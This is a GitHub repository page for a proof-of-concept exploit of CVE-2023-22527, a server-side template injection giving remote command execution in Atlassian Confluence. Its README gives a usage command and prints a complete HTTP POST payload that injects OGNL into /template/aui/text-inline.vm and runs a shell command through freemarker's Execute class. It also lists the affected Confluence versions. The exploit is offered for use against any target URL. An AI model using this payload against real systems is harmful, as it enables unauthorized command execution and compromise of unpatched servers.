Skip to content
/ CVE-2023-22527 Public

script for exploiting CVE-2023-22527, which is described as a Server-Side Template Injection (SSTI) vulnerability in Atlassian Confluence

License

MIT license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

AxthonyV/CVE-2023-22527

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
CVE-2023-22527.py
CVE-2023-22527.py
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2023-22527

CVE-2023-22527 | RCE using SSTI in Confluence

Description

  • CVE-2023-22527 refers to an ServerSide template injection vulnerability in freemarker engine that allows users to execute command on the webserver.
  • This code is a proof-of-concept (PoC) script for exploiting CVE-2023-22527, which is described as a Server-Side Template Injection (SSTI) vulnerability in Atlassian Confluence.

USAGE

python3 CVE-2023-22527.py -u  http://target.com

Payload

POST /template/aui/text-inline.vm HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 278

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"id"}))

Affected versions

8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3

References

About

script for exploiting CVE-2023-22527, which is described as a Server-Side Template Injection (SSTI) vulnerability in Atlassian Confluence

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages